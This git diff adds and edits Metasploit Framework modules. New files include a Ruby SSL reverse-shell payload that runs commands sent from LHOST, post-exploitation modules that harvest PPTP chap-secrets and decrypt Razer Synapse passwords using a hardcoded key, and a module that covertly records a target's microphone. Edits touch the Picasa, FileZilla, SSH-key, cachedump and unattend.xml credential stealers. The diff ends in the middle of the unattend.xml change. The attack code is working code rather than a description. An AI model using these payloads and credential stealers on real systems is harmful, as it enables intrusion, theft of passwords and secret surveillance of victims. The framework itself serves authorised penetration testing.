diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
new file mode 100644
index 000000000000..82f61c768d6b
--- /dev/null
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
@@ -0,0 +1,52 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/payload/ruby'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Payload::Ruby
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Ruby Command Shell, Reverse TCP SSL',
+ 'Version' => '$Revision$',
+ 'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
+ 'Author' => 'RageLtMan',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'ruby',
+ 'Arch' => ARCH_RUBY,
+ 'Handler' => Msf::Handler::ReverseTcpSsl,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'ruby',
+ 'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+ ))
+ end
+
+ def generate
+ rbs = prepends(ruby_string)
+ vprint_good rbs
+ return rbs
+ end
+
+ def ruby_string
+ lhost = datastore['LHOST']
+ lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+ rbs = "require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end"
+ return rbs
+ end
+end
diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb
new file mode 100644
index 000000000000..b351fbbb7217
--- /dev/null
+++ b/modules/post/linux/gather/pptpd_chap_secrets.rb
@@ -0,0 +1,130 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/post/common'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::Common
+ include Msf::Post::File
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Linux Gather PPTP VPN chap-secrets Credentials',
+ 'Description' => %q{
+ This module collects PPTP VPN information such as client, server, password,
+ and IP from your target server's chap-secrets file.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'sinn3r'],
+ 'Platform' => [ 'linux' ],
+ 'SessionTypes' => [ "shell", "meterpreter" ]
+ ))
+
+ register_options(
+ [
+ OptString.new('FILE', [true, 'The default path for chap-secrets', '/etc/ppp/chap-secrets'])
+ ], self.class)
+ end
+
+
+ #
+ # Reads chap_secrets
+ #
+ def load_file(fname)
+ begin
+ data = cmd_exec("cat #{fname}")
+ rescue RequestError => e
+ print_error("Failed to retrieve file. #{e.message}")
+ data = ''
+ end
+
+ if data =~ /^#{fname}: regular file, no read permission$/ or data =~ /Permission denied$/
+ return :access_denied
+ elsif data =~ /\(No such file or directory\)$/
+ return :not_found
+ elsif data.empty?
+ return :empty
+ end
+
+ return data
+ end
+
+
+ #
+ # Extracts client, server, secret, and IP addresses
+ #
+ def extract_secrets(data)
+ tbl = Rex::Ui::Text::Table.new({
+ 'Header' => 'PPTPd chap-secrets',
+ 'Indent' => 1,
+ 'Columns' => ['Client', 'Server', 'Secret', 'IP']
+ })
+
+ data.each_line do |l|
+ # If this line is commented out, ignore it
+ next if l =~ /^[[:blank:]]*#/
+
+ found = l.split
+
+ # Nothing is found, skip!
+ next if found.empty?
+
+ client = (found[0] || '').strip
+ server = (found[1] || '').strip
+ secret = (found[2] || '').strip
+ ip = (found[3,found.length] * ", " || '').strip
+
+ report_auth_info({
+ :host => session.session_host,
+ :port => 1723, #PPTP port
+ :sname => 'pptp',
+ :user => client,
+ :pass => secret,
+ :type => 'password',
+ :active => true
+ })
+
+ tbl << [client, server, secret, ip]
+ end
+
+ if tbl.rows.empty?
+ print_status("This file has no secrets: #{datastore['FILE']}")
+ else
+ print_line(tbl.to_s)
+
+ p = store_loot(
+ 'linux.chapsecrets.creds',
+ 'text/csv',
+ session,
+ tbl.to_csv,
+ File.basename(datastore['FILE'] + ".txt")
+ )
+ print_good("Secrets stored in: #{p}")
+ end
+ end
+
+
+ def run
+ fname = datastore['FILE']
+ f = load_file(fname)
+
+ case f
+ when :access_denied
+ print_error("No permission to read: #{fname}")
+ when :not_found
+ print_error("Not found: #{fname}")
+ when :empty
+ print_status("File is actually empty: #{fname}")
+ else
+ extract_secrets(f)
+ end
+ end
+
+end
\ No newline at end of file
diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb
index eaad0884e7b3..6b4291f989b4 100644
--- a/modules/post/multi/gather/skype_enum.rb
+++ b/modules/post/multi/gather/skype_enum.rb
@@ -75,7 +75,7 @@ def run
process_db(db_in_loot,p['name'])
end
end
- elsif (session.platfom =~ /win/ and session.type =~ /meter/)
+ elsif (session.platform =~ /win/ and session.type =~ /meter/)
# Iterate thru each user profile in a Windows System using Meterpreter Post API
grab_user_profiles().each do |p|
if check_skype(p['AppData'],p['UserName'])
diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb
index 60638eece62a..46966745998c 100644
--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -61,11 +61,12 @@ def download_loot(paths)
end
files.each do |file|
- print_good("Downloading #{path}#{sep}#{file} -> #{file}")
+ next if [".", ".."].include?(file)
data = read_file("#{path}#{sep}#{file}")
file = file.split(sep).last
loot_path = store_loot("ssh.#{file}", "text/plain", session, data,
"ssh_#{file}", "OpenSSH #{file} File")
+ print_good("Downloaded #{path}#{sep}#{file} -> #{loot_path}")
# If the key is encrypted, this will fail and it won't be stored as a
# cred. That's ok because we can't really use encrypted keys anyway.
diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb
new file mode 100644
index 000000000000..31a1c34e1810
--- /dev/null
+++ b/modules/post/multi/manage/record_mic.rb
@@ -0,0 +1,86 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Multi Manage Record Microphone',
+ 'Description' => %q{
+ This module will enable and record your target's microphone.
+ For non-Windows targets, please use Java meterpreter to be
+ able to use this feature.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'sinn3r'],
+ 'Platform' => [ 'win', 'linux', 'osx' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptInt.new('DURATION', [false, 'Number of seconds to record', 5])
+ ], self.class)
+ end
+
+ def rhost
+ client.sock.peerhost
+ end
+
+ def progress
+ duration = datastore['DURATION']
+ m = duration / 10
+ m = 1 if m == 0
+
+ duration.times do |i|
+ if i % m == 0
+ p = ((Float((i == 0) ? 1 : i+1) / duration) * 100).round
+ print_status("#{rhost} - #{p.to_s}%...")
+ end
+ select(nil, nil, nil, 1)
+ end
+ end
+
+ def run
+ if client.nil?
+ print_error("Invalid session ID selected. Make sure the host isn't dead.")
+ return
+ end
+
+ data = nil
+
+ begin
+ t = framework.threads.spawn("prog", false) { progress }
+ data = client.webcam.record_mic(datastore['DURATION'])
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error(e.message)
+ return
+ ensure
+ t.kill
+ end
+
+ if data
+ print_status("#{rhost} - Audio size: (#{data.length.to_s} bytes)")
+ p = store_loot(
+ "#{rhost}.audio",
+ 'application/octet-stream',
+ rhost,
+ data,
+ "#{rhost}_audio.wav",
+ "#{rhost} Audio Recording"
+ )
+
+ print_good("#{rhost} - Audio recording saved: #{p}")
+ end
+ end
+
+end
\ No newline at end of file
diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb
index e2e1273030f5..41155587d1ad 100644
--- a/modules/post/multi/manage/sudo.rb
+++ b/modules/post/multi/manage/sudo.rb
@@ -30,7 +30,11 @@ def initialize(info={})
versions from 2008 and later which support -A.
},
'License' => MSF_LICENSE,
- 'Author' => [ 'todb <todb[at]metasploit.com>'],
+ 'Author' =>
+ [
+ 'todb <todb[at]metasploit.com>',
+ 'Ryan Baxendale <rbaxendale[at]gmail.com>' #added password option
+ ],
'Platform' => [ 'linux','unix','osx','solaris','aix' ],
'References' =>
[
@@ -39,6 +43,11 @@ def initialize(info={})
],
'SessionTypes' => [ 'shell' ] # Need to test 'meterpreter'
))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [false, 'The password to use when running sudo.'])
+ ], self.class)
end
# Run Method for when run command is issued
@@ -57,7 +66,12 @@ def run
end
def get_root
- password = session.exploit_datastore['PASSWORD']
+ if datastore['PASSWORD']
+ password = datastore['PASSWORD']
+ else
+ password = session.exploit_datastore['PASSWORD']
+ end
+
if password.to_s.empty?
print_status "No password available, trying a passwordless sudo."
else
diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
index dddf43ab7e71..579522017420 100644
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -516,9 +516,6 @@ def run
end
end
- store_loot("mscache.creds", "text/csv", session, @credentials.to_csv,
- "mscache_credentials.txt", "MSCACHE Credentials")
-
print_status("John the Ripper format:")
john.split("\n").each do |pass|
@@ -527,8 +524,13 @@ def run
if( @vista == 1 )
print_status("Hash are in MSCACHE_VISTA format. (mscash2)")
+ p = store_loot("mscache2.creds", "text/csv", session, @credentials.to_csv, "mscache2_credentials.txt", "MSCACHE v2 Credentials")
+ print_status("MSCACHE v2 saved in: #{p}")
+
else
print_status("Hash are in MSCACHE format. (mscash)")
+ p = store_loot("mscache.creds", "text/csv", session, @credentials.to_csv, "mscache_credentials.txt", "MSCACHE v1 Credentials")
+ print_status("MSCACHE v1 saved in: #{p}")
end
rescue ::Interrupt
diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
index ff188cd1411c..8977cbcc5e33 100644
--- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
+++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
@@ -19,18 +19,18 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
- 'Name' => 'Windows Gather Google Picasa Password Extractor',
+ 'Name' => 'Windows Gather Google Picasa Password Extractor',
'Description' => %q{
This module extracts and decrypts the login passwords
stored by Google Picasa.
},
- 'License' => MSF_LICENSE,
- 'Author' =>
+ 'License' => MSF_LICENSE,
+ 'Author' =>
[
'SecurityXploded Team', #www.SecurityXploded.com
'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',
],
- 'Platform' => [ 'win' ],
+ 'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
@@ -70,33 +70,12 @@ def decrypt_password(data)
end
def get_registry
- psecrets = ""
begin
print_status("Looking in registry for stored login passwords by Picasa ...")
- username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\",
- 'GaiaEmail')
- password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\",
- 'GaiaPass')
-
- if username != nil and password != nil
- passbin = [password].pack("H*")
- pass = decrypt_password(passbin)
-
- if pass != nil
- print_status("Username: #{username}")
- print_status("Password: #{pass}")
- secret = "#{username}:#{pass}"
- psecrets << secret
- end
- end
-
- #For early versions of Picasa3
- username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
- 'GaiaEmail')
- password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
- 'GaiaPass')
+ username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaEmail') || ''
+ password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaPass') || ''
credentials = Rex::Ui::Text::Table.new(
'Header' => "Picasa Credentials",
@@ -107,29 +86,55 @@ def get_registry
"Password"
])
- if username != nil and password != nil
+ foundcreds = 0
+ if !username.empty? and !password.empty?
+ passbin = [password].pack("H*")
+ pass = decrypt_password(passbin)
+
+ if pass and !pass.empty?
+ print_status("Found Picasa 2 credentials.")
+ print_good("Username: #{username}\t Password: #{pass}")
+
+ foundcreds = 1
+ credentials << [username,pass]
+ end
+ end
+
+ #For early versions of Picasa3
+ username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaEmail') || ''
+ password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaPass') || ''
+
+
+ if !username.empty? and !password.empty?
passbin = [password].pack("H*")
pass = decrypt_password(passbin)
- if pass != nil
- print_status("Username: #{username}")
- print_status("Password: #{pass}")
+ if pass and !pass.empty?
+ print_status("Found Picasa 3 credentials.")
+ print_good("Username: #{username}\t Password: #{pass}")
+ foundcreds = 1
credentials << [username,pass]
- path = store_loot(
- "picasa.creds",
- "text/csv",
- session,
- credentials.to_csv,
- "decrypted_picasa_data.csv",
- "Decrypted Picasa Passwords")
-
- print_status("Decrypted passwords saved in: #{path}")
end
end
+ if foundcreds == 1
+ path = store_loot(
+ "picasa.creds",
+ "text/csv",
+ session,
+ credentials.to_csv,
+ "decrypted_picasa_data.csv",
+ "Decrypted Picasa Passwords"
+ )
+
+ print_status("Decrypted passwords saved in: #{path}")
+ else
+ print_status("No Picasa credentials found.")
+ end
+
rescue ::Exception => e
- print_error("An error has occurred: #{e.to_s}")
+ print_error("An error has occurred: #{e.to_s}")
end
end
diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb
index a21ea3f81283..619b80190e49 100644
--- a/modules/post/windows/gather/credentials/filezilla_server.rb
+++ b/modules/post/windows/gather/credentials/filezilla_server.rb
@@ -89,10 +89,10 @@ def get_filezilla_creds(paths)
'Indent' => 1,
'Columns' =>
[
- "User",
- "Password",
"Host",
"Port",
+ "User",
+ "Password",
"SSL"
])
@@ -105,14 +105,15 @@ def get_filezilla_creds(paths)
"User",
"Dir",
"FileRead",
+ "FileWrite",
"FileDelete",
"FileAppend",
"DirCreate",
"DirDelete",
"DirList",
"DirSubdirs",
- "Home",
- "AutoCreate"
+ "AutoCreate",
+ "Home"
])
configuration = Rex::Ui::Text::Table.new(
@@ -167,7 +168,7 @@ def get_filezilla_creds(paths)
perms.each do |perm|
permissions << [perm['host'], perm['user'], perm['dir'], perm['fileread'], perm['filewrite'], perm['filedelete'], perm['fileappend'],
- perm['dircreate'], perm['dirdelete'], perm['dirlist'], perm['dirsubdirs'], perm['autocreate']]
+ perm['dircreate'], perm['dirdelete'], perm['dirlist'], perm['dirsubdirs'], perm['autocreate'], perm['home']]
end
vprint_status(" Collected the following configuration details:")
diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb
new file mode 100644
index 000000000000..b0b569ade040
--- /dev/null
+++ b/modules/post/windows/gather/credentials/razer_synapse.rb
@@ -0,0 +1,121 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/windows/user_profiles'
+require 'openssl'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::Common
+ include Msf::Post::Windows::UserProfiles
+ include Msf::Post::File
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Razer Synapse Password Extraction',
+ 'Description' => %q{
+ This module will enumerate passwords stored by the Razer Synapse
+ client. The encryption key and iv is publicly known. This module
+ will not only extract encrypted password but will also decrypt
+ password using public key. Affects versions earlier than 1.7.15.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
+ 'Matt Howard "pasv" <themdhoward[at]gmail.com>', #PoC
+ 'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'http://www.pentestgeek.com/2013/01/16/hard-coded-encryption-keys-and-more-wordpress-fun/' ],
+ [ 'URL', 'https://github.com/pasv/Testing/blob/master/Razer_decode.py' ]
+ ],
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'Platform' => [ 'win' ]
+ ))
+ end
+
+ # decrypt password
+ def decrypt(hash)
+ cipher = OpenSSL::Cipher::Cipher.new 'aes-256-cbc'
+ cipher.decrypt
+ cipher.key = "hcxilkqbbhczfeultgbskdmaunivmfuo"
+ cipher.iv = "ryojvlzmdalyglrj"
+
+ hash.each_pair { |user,pass|
+ pass = pass.unpack("m")[0]
+
+ password = cipher.update pass
+ password << cipher.final rescue return nil
+
+ store_creds(user, password.split("||")[1])
+ print_good("Found credentials")
+ print_good("\tUser: #{user}")
+ print_good("\tPassword: #{password.split("||")[1]}")
+ }
+ end
+
+ def store_creds(user, pass)
+ if db
+ report_auth_info(
+ :host => Rex::Socket.resolv_to_dotted("www.razerzone.com"),
+ :port => 443,
+ :ptype => 'password',
+ :sname => 'razer_synapse',
+ :user => user,
+ :pass => pass,
+ :duplicate_ok => true,
+ :active => true
+ )
+ vprint_status("Loot stored in the db")
+ end
+ end
+
+ # Loop throuhg config, grab user and pass
+ def parse_config(config)
+ if not config =~ /<Version>\d<\/Version>/
+ creds = {}
+ cred_group = config.split("</SavedCredentials>")
+ cred_group.each { |cred|
+ user = /<Username>([^<]+)<\/Username>/.match(cred)
+ pass = /<Password>([^<]+)<\/Password>/.match(cred)
+ if user and pass
+ creds[user[1]] = pass[1]
+ end
+ }
+ return creds
+ else
+ print_error("Module only works against configs from version < 1.7.15")
+ return nil
+ end
+ end
+
+ # main control method
+ def run
+ grab_user_profiles().each do |user|
+ if user['LocalAppData']
+ accounts = user['LocalAppData'] + "\\Razer\\Synapse\\Accounts\\RazerLoginData.xml"
+ next if not file?(accounts)
+ print_status("Config found for user #{user['UserName']}")
+
+ contents = read_file(accounts)
+
+ # read the contents of file
+ creds = parse_config(contents)
+ if creds
+ decrypt(creds)
+ else
+ print_error("Could not read config or empty for #{user['UserName']}")
+ end
+ end
+ end
+ end
+end
\ No newline at end of file
diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb
new file mode 100644
index 000000000000..7909ee8966ef
--- /dev/null
+++ b/modules/post/windows/gather/enum_ad_computers.rb
@@ -0,0 +1,233 @@
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'rex'
+require 'msf/core'
+require 'msf/core/auxiliary/report'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Windows Gather AD Enumerate Computers',
+ 'Description' => %q{
+ This module will enumerate computers in the default AD directory.
+
+ Optional Attributes:
+ objectClass, cn, description, distinguishedName, instanceType, whenCreated,
+ whenChanged, uSNCreated, uSNChanged, name, objectGUID,
+ userAccountControl, badPwdCount, codePage, countryCode,
+ badPasswordTime, lastLogoff, lastLogon, localPolicyFlags,
+ pwdLastSet, primaryGroupID, objectSid, accountExpires,
+ logonCount, sAMAccountName, sAMAccountType, operatingSystem,
+ operatingSystemVersion, operatingSystemServicePack, serverReferenceBL,
+ dNSHostName, rIDSetPreferences, servicePrincipalName, objectCategory,
+ netbootSCPBL, isCriticalSystemObject, frsComputerReferenceBL,
+ lastLogonTimestamp, msDS-SupportedEncryptionTypes
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' ],
+ 'Platform' => [ 'win' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options([
+ OptInt.new('MAX_SEARCH', [true, 'Maximum values to retrieve, 0 for all.', 20]),
+ OptBool.new('STORE', [true, 'Store file in loot.', false]),
+ OptString.new('ATTRIBS', [true, 'Attributes to retrieve.', 'dNSHostName,distinguishedName,description,operatingSystem'])
+ ], self.class)
+ end
+
+ def read_value(addr)
+ val_size = client.railgun.memread(addr-4,4).unpack('V*')[0]
+ value = client.railgun.memread(addr, val_size)
+ return value.strip
+ end
+
+ def run
+ unless session.platform == "x64/win64"
+ print_error("Does not work in x86 meterpreter (use x64 instead) see: http://dev.metasploit.com/redmine/issues/7639");
+ return
+ end
+
+ print_status("Connecting to default LDAP server")
+ session_handle = bind_default_ldap_server
+
+ return false unless session_handle
+
+ print_status("Querying default naming context")
+
+ query_result = query_ldap(session_handle, "", 0, "(objectClass=computer)", ["defaultNamingContext"])
+ first_entry_attributes = query_result[0]['attributes']
+ defaultNamingContext = first_entry_attributes[0]['values'] # Value from First Attribute of First Entry
+
+ print_status("Default Naming Context #{defaultNamingContext}")
+
+ attributes = datastore['ATTRIBS'].split(',')
+
+ print_status("Querying computer objects - Please wait...")
+ results = query_ldap(session_handle, defaultNamingContext, 2, "(objectClass=computer)", attributes)
+
+ print_status("Unbinding from LDAP service.")
+ wldap32.ldap_unbind(session_handle)
+
+ results_table = Rex::Ui::Text::Table.new(
+ 'Header' => 'AD Computers',
+ 'Indent' => 1,
+ 'SortIndex' => -1,
+ 'Columns' => attributes
+ )
+
+ results.each do |result|
+ row = []
+
+ result['attributes'].each do |attr|
+ if attr['values'].nil?
+ row << ""
+ else
+ row << attr['values']
+ end
+ end
+
+ results_table << row
+
+ end
+
+ print_line results_table.to_s
+ if datastore['STORE']
+ stored_path = store_loot('ad.computers', 'text/plain', session, results_table.to_csv)
+ print_status("Results saved to: #{stored_path}")
+ end
+ end
+
+ def wldap32
+ return client.railgun.wldap32
+ end
+
+ def bind_default_ldap_server
+ vprint_status ("Initializing LDAP connection.")
+ session_handle = wldap32.ldap_sslinitA("\x00\x00\x00\x00", 389, 0)['return']
+ vprint_status("LDAP Handle: #{session_handle}")
+
+ if session_handle == 0
+ print_error("Unable to connect to LDAP server")
+ wldap32.ldap_unbind(session_handle)
+ return false
+ end
+
+ vprint_status ("Binding to LDAP server.")
+ bind = wldap32.ldap_bind_sA(session_handle, nil, nil, 0x0486)['return'] #LDAP_AUTH_NEGOTIATE 0x0486
+
+ if bind != 0
+ print_error("Unable to bind to LDAP server")
+ wldap32.ldap_unbind(session_handle)
+ return false
+ end
+
+ return session_handle
+ end
+
+ def query_ldap(session_handle, base, scope, filter, attributes)
+ vprint_status ("Searching LDAP directory.")
+ search = wldap32.ldap_search_sA(session_handle, base, scope, filter, nil, 0, 4)
+ vprint_status("search: #{search}")
+
+ if search['return'] != 0
+ print_error("No results")
+ wldap32.ldap_msgfree(search['res'])
+ return
+ end
+
+ search_count = wldap32.ldap_count_entries(session_handle, search['res'])['return']
+
+ if(search_count == 0)
+ print_error("No entries retrieved")
+ wldap32.ldap_msgfree(search['res'])
+ return
+ end
+
+ print_status("Entries retrieved: #{search_count}")
+
+ vprint_status("Retrieving results...")
+
+ entries = {}
+ entry_results = []
+
+ if datastore['MAX_SEARCH'] == 0
+ max_search = search_count
+ else
+ max_search = [datastore['MAX_SEARCH'], search_count].min
+ end
+
+ 0.upto(max_search - 1) do |i|
+ print '.'
+
+ if(i==0)
+ entries[0] = wldap32.ldap_first_entry(session_handle, search['res'])['return']
+ else
+ entries[i] = wldap32.ldap_next_entry(session_handle, entries[i-1])['return']
+ end
+
+ if(entries[i] == 0)
+ print_error("Failed to get entry.")
+ wldap32.ldap_unbind(session_handle)
+ wldap32.ldap_msgfree(search['res'])
+ return
+ end
+
+ vprint_status("Entry #{i}: #{entries[i]}")
+
+ attribute_results = []
+ attributes.each do |attr|
+ vprint_status("Attr: #{attr}")
+
+ pp_value = wldap32.ldap_get_values(session_handle, entries[i], attr)['return']
+ vprint_status("ppValue: 0x#{pp_value.to_s(16)}")
+
+ if pp_value == 0
+ vprint_error("No attribute value returned.")
+ else
+ count = wldap32.ldap_count_values(pp_value)['return']
+ vprint_status "Value count: #{count}"
+
+ value_results = []
+ if count < 1
+ vprint_error("Bad Value List")
+ else
+ 0.upto(count - 1) do |j|
+ p_value = client.railgun.memread(pp_value+(j*4), 4).unpack('V*')[0]
+ vprint_status "p_value: 0x#{p_value.to_s(16)}"
+ value = read_value(p_value)
+ vprint_status "Value: #{value}"
+ if value.nil?
+ value_results << ""
+ else
+ value_results << value
+ end
+ end
+ value_results = value_results.join('|')
+ end
+ end
+
+ if pp_value != 0
+ vprint_status("Free value memory.")
+ wldap32.ldap_value_free(pp_value)
+ # wldap32.ldap_memfree(attr) No need to free attributes as these are hardcoded
+ end
+
+ attribute_results << {"name" => attr, "values" => value_results}
+ end
+
+ entry_results << {"id" => i, "attributes" => attribute_results}
+ end
+
+ print_line
+ return entry_results
+ end
+end
diff --git a/modules/post/windows/gather/enum_unattend.rb b/modules/post/windows/gather/enum_unattend.rb
index 8fcf768d1627..baa33094ccdf 100644
--- a/modules/post/windows/gather/enum_unattend.rb
+++ b/modules/post/windows/gather/enum_unattend.rb
@@ -7,6 +7,7 @@
require 'msf/core'
require 'msf/core/post/file'
+require 'rex/parser/unattend'
require 'rexml/document'
class Metasploit3 < Msf::Post
@@ -45,7 +46,7 @@ def initialize(info={})
#
- # Determie if unattend.xml exists or not
+ # Determine if unattend.xml exists or not
#
def unattend_exists?(xml_path)
x = session.fs.file.stat(xml_path) rescue nil
@@ -75,152 +76,6 @@ def load_unattend(xml_path)
return xml, raw
end
-
- #
- # Extract sensitive data from UserAccounts
- #
- def extract_useraccounts(user_accounts)
- return[] if user_accounts.nil?
-
- cred_tables = []
- account_types = ['AdministratorPassword', 'DomainAccounts', 'LocalAccounts']
- account_types.each do |t|
- element = user_accounts.elements[t]
- next if element.nil?
-
- case t
- #
- # Extract the password from AdministratorPasswords
- #
- when account_types[0]
- table = Rex::Ui::Text::Table.new({
- 'Header' => 'AdministratorPasswords',
- 'Indent' => 1,
- 'Columns' => ['Username', 'Password']
- })
-
- password = element.elements['Value'].get_text.value rescue ''
- plaintext = element.elements['PlainText'].get_text.value rescue 'true'
-
- if plaintext == 'false'
- password = Rex::Text.decode_base64(password)
- password = password.gsub(/#{Rex::Text.to_unicode('AdministratorPassword')}$/, '')
- end
-
- if not password.empty?
- table << ['Administrator', password]
- cred_tables << table
- end
-
- #
- # Extract the sensitive data from DomainAccounts.
- # According to MSDN, unattend.xml doesn't seem to store passwords for domain accounts
- #
- when account_types[1] #DomainAccounts
- table = Rex::Ui::Text::Table.new({
- 'Header' => 'DomainAccounts',
- 'Indent' => 1,
- 'Columns' => ['Username', 'Group']
- })
-
- element.elements.each do |account_list|
- name = account_list.elements['DomainAccount/Name'].get_text.value rescue ''
- group = account_list.elements['DomainAccount/Group'].get_text.value rescue 'true'
-
- table << [name, group]
- end
-
- cred_tables << table if not table.rows.empty?
-
- #
- # Extract the username/password from LocalAccounts
- #
- when account_types[2] #LocalAccounts
- table = Rex::Ui::Text::Table.new({
- 'Header' => 'LocalAccounts',
- 'Indent' => 1,
- 'Columns' => ['Username', 'Password']
- })
-
- element.elements.each do |local|
- password = local.elements['Password/Value'].get_text.value rescue ''
- plaintext = local.elements['Password/PlainText'].get_text.value rescue 'true'
-
- if plaintext == 'false'
- password = Rex::Text.decode_base64(password)
- password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '')
- end
-
- username = local.elements['Name'].get_text.value rescue ''
- table << [username, password]
- end
-
- cred_tables << table if not table.rows.empty?
- end
- end
-
- return cred_tables
- end
-
-
- #
- # Extract sensitive data from AutoLogon
- #
- def extract_autologon(auto_logon)
- return [] if auto_logon.nil?
-
- domain = auto_logon.elements['Domain'].get_text.value rescue ''
- username = auto_logon.elements['Username'].get_text.value rescue ''
- password = auto_logon.elements['Password/Value'].get_text.value rescue ''
- plaintext = auto_logon.elements['Password/PlainText'].get_text.value rescue 'true'
-
- if plaintext == 'false'
- password = Rex::Text.decode_base64(password)
- password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '')
- end
-
- table = Rex::Ui::Text::Table.new({
- 'Header' => 'AutoLogon',
- 'Indent' => 1,
- 'Columns' => ['Domain', 'Username', 'Password']
- })
-
- table << [domain, username, password]
-
- return [table]
- end
-
-
- #
- # Extract sensitive data from Deployment Services.
- # We can only seem to add one <Login> with Windows System Image Manager, so
- # we'll only enum one.
- #
- def extract_deployment(deployment)
- return [] if deployment.nil?
-
- domain = deployment.elements['Login/Credentials/Domain'].get_text.value rescue ''
- username = deployment.elements['Login/Credentials/Username'].get_text.value rescue ''
- password = deployment.elements['Login/Credentials/Password'].get_text.value rescue ''
- plaintext = deployment.elements['Login/Credentials/Password/PlainText'].get_text.value rescue 'true'
-
- if plaintext == 'false'
- password = Rex::Text.decode_base64(password)
- password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '')
- end
-
- table = Rex::Ui::Text::Table.new({
